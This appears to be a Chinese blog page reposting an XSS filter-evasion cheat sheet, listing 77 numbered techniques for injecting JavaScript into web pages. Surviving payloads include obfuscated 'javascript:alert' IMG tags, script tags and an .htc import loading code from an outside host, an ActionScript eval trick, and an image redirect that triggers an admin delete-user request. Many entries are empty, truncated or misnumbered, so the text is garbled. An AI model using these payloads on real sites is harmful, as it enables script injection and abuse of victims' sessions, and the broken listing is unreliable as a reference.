2. 软件开发
    3. 普通的XSS脚本写法

    普通的XSS脚本写法

    xiaoxiao2022-07-05  163

    1)普通的XSS JavaScript注入

    (2)IMG标签XSS使用JavaScript命令

    (3)IMG标签无分号无引号

    (4)IMG标签大小写不敏感

    (5)HTML编码(必须有分号)

    (6)修正缺陷IMG标签 <IMG “”">”>

    (7)formCharCode标签(计算器)

    (8)UTF-8的Unicode编码(计算器) <IMG SRC=jav…省略…S’)>

    (9)7位的UTF-8的Unicode编码是没有分号的(计算器) <IMG SRC=jav…省略…S’)>

    (10)十六进制编码也是没有分号(计算器)

    (11)嵌入式标签,将Javascript分开 <IMG SRC=”jav ascript:alert(‘XSS’);”>

    (12)嵌入式编码标签,将Javascript分开 <IMG SRC=”jav ascript:alert(‘XSS’);”>

    (13)嵌入式换行符 <IMG SRC=”jav ascript:alert(‘XSS’);”>

    (14)嵌入式回车 <IMG SRC=”jav ascript:alert(‘XSS’);”>

    (15)嵌入式多行注入JavaScript,这是XSS极端的例子

    (16)解决限制字符(要求同页面)

    (17)空字符 perl -e ‘print “”;’ > out

    (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用 perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out

    (19)Spaces和meta前的IMG标签 <IMG SRC=” javascript:alert(‘XSS’);”>

    (20)Non-alpha-non-digit XSS <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”>

    (21)Non-alpha-non-digit XSS to 2

    (22)Non-alpha-non-digit XSS to 3 <SCRIPT/SRC=”http://3w.org/XSS/xss.js”>

    (23)双开括号 <

    (24)无结束脚本标记(仅火狐等浏览器)

    (29)换码过滤的JavaScript \”;alert(‘XSS’);//

    (30)结束Title标签

    (31)Input Image

    (32)BODY Image

    (33)BODY标签 <BODY(‘XSS’)>

    (34)IMG Dynsrc

    (35)IMG Lowsrc

    (36)BGSOUND

    (37)STYLE sheet

    (38)远程样式表

    (39)List-style-image(列表式)

    XSS

    (40)IMG VBscript

    XSS

    (41)META链接url

    (42)Iframe

    (43)Frame

    (44)Table

    (45)TD

    (46)DIV background-image

    (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)

    (48)DIV expression

    (49)STYLE属性分拆表达

    (50)匿名STYLE(组成:开角号和一个字母开头)

    (51)STYLE background-image

    (52)IMG STYLE方式 exppression(alert(“XSS”))’>

    (53)STYLE background

    (54)BASE

    (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS

    (56)在flash中使用ActionScrpt可以混进你XSS的代码 a=”get”; b=”URL(\”"; c=”javascript:”; d=”alert(‘XSS’);\”)”; eval_r(a+b+c+d);

    (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上

    <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”> XSS

    (58)如果过滤了你的JS你可以在图片里添加JS代码来利用

    (59)IMG嵌入式命令,可执行任意命令 <IMG SRC=”http://www.XXX.com/a.php?a=b”>

    (60)IMG嵌入式命令(a.jpg在同服务器) Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

    (61)绕符号过滤

    (62)

    (63)

    (64)

    (65)

    (66)

    (67)

    (68)URL绕行 XSS

    (69)URL编码 XSS

    (70)IP十进制 XSS

    (71)IP十六进制 XSS

    (72)IP八进制 XSS

    (73)混合编码 <A HREF=”h tt p://6 6.000146.0×7.147/”">XSS

    (74)节省[http:] XSS

    (75)节省[www] XSS

    (76)绝对点绝对DNS XSS

    (77)javascript链接 <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS

    最新回复(0)